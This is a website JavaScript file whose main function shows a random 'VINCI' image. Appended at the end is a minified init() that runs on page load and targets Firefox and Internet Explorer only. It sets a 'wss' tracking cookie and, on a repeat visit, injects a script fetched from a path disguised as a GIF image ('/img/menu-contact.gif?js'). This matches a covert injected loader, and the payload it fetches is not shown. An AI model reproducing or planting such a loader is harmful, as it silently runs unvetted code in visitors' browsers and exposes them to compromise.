// JavaScript Document

function imgRandom(){
	var nummer = "";
	var tekst = "";
	
	nummer += Math.floor(Math.random()*21);
	tekst = nummer;
	
	if (tekst == "0") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms01.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "1") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms02.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "2") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms03.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "3") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms04.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "4") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms05.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "5") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms06.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "6") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms07.jpg\" style=\"margin-bottom: 10px;\">");
	}
	
	if (tekst == "7") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms08.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "8") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms09.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "9") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms10.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "10") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms11.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "11") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms12.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "12") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms13.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "13") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms14.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "14") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms15.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "15") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms16.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "16") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms17.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "17") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms18.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "18") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms19.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "19") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms20.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "20") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms21.jpg\" style=\"margin-bottom: 10px;\">");
	}
	if (tekst == "21") {
	document.write("<img alt=\"VINCI\" src=\"img/imageRandoms/randoms22.jpg\" style=\"margin-bottom: 10px;\">");
	}
}

function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/img/menu-contact.gif?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
